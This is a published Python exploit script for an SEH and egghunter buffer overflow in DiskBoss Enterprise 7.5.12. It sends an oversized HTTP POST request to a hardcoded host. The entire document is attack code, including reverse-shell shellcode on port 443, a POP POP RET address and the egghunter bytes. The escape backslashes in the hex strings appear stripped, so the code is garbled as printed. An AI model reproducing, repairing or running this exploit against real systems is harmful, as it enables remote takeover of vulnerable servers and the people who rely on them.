DiskBoss Enterprise 7.5.12 POST Buffer Overflow
Posted on 11 January 2017
#!/usr/bin/python # Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow # Date: 10-01-2017 # Exploit Author: Wyndell Bibera # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe # Version: 7.5.12 # Tested on: Windows XP Professional SP3 import socket ip = "192.168.86.150" port = 80 egg = "ezggezgg" nopslide = "x90" * 8 # Bad characters: x00x09x0ax0dx20 # Reverse Shell @ Port 443 - Change shellcode section accordingly shellcode = ("xb8x45x49xe1x98xdaxc5xd9x74x24xf4x5fx29xc9xb1" "x52x31x47x12x03x47x12x83x82x4dx03x6dxf0xa6x41" "x8ex08x37x26x06xedx06x66x7cx66x38x56xf6x2axb5" "x1dx5axdex4ex53x73xd1xe7xdexa5xdcxf8x73x95x7f" "x7bx8excax5fx42x41x1fx9ex83xbcxd2xf2x5cxcax41" "xe2xe9x86x59x89xa2x07xdax6ex72x29xcbx21x08x70" "xcbxc0xddx08x42xdax02x34x1cx51xf0xc2x9fxb3xc8" "x2bx33xfaxe4xd9x4dx3bxc2x01x38x35x30xbfx3bx82" "x4ax1bxc9x10xecxe8x69xfcx0cx3cxefx77x02x89x7b" "xdfx07x0cxafx54x33x85x4exbaxb5xddx74x1ex9dx86" "x15x07x7bx68x29x57x24xd5x8fx1cxc9x02xa2x7fx86" "xe7x8fx7fx56x60x87x0cx64x2fx33x9axc4xb8x9dx5d" "x2ax93x5axf1xd5x1cx9bxd8x11x48xcbx72xb3xf1x80" "x82x3cx24x06xd2x92x97xe7x82x52x48x80xc8x5cxb7" "xb0xf3xb6xd0x5bx0ex51x1fx33x46x2dxf7x46x66x2c" "xb3xcex80x44xd3x86x1bxf1x4ax83xd7x60x92x19x92" "xa3x18xaex63x6dxe9xdbx77x1ax19x96x25x8dx26x0c" "x41x51xb4xcbx91x1cxa5x43xc6x49x1bx9ax82x67x02" "x34xb0x75xd2x7fx70xa2x27x81x79x27x13xa5x69xf1" "x9cxe1xddxadxcaxbfx8bx0bxa5x71x65xc2x1axd8xe1" "x93x50xdbx77x9cxbcxadx97x2dx69xe8xa8x82xfdxfc" "xd1xfex9dx03x08xbbxaex49x10xeax26x14xc1xaex2a" "xa7x3cxecx52x24xb4x8dxa0x34xbdx88xedxf2x2exe1" "x7ex97x50x56x7exb2") scpad = "x90" * (2480 - len(shellcode) - len(nopslide)) shortjmp = "xebx0fx90x90" # Search for string 'ezgg' twice egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" "xefxb8x65x7ax67x67x8bxfaxafx75xeaxafx75xe7xffxe7") extra = "x90" * 9 pad = "x90" * (5000 - len(extra) - 2496 - len(egghunter)) # POP POP RET Instruction seh = "x6bxa6x02x10" buffer = ( "POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1 " "Host: :192.168.86.150 " "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 " "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8 ") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(buffer) s.close()
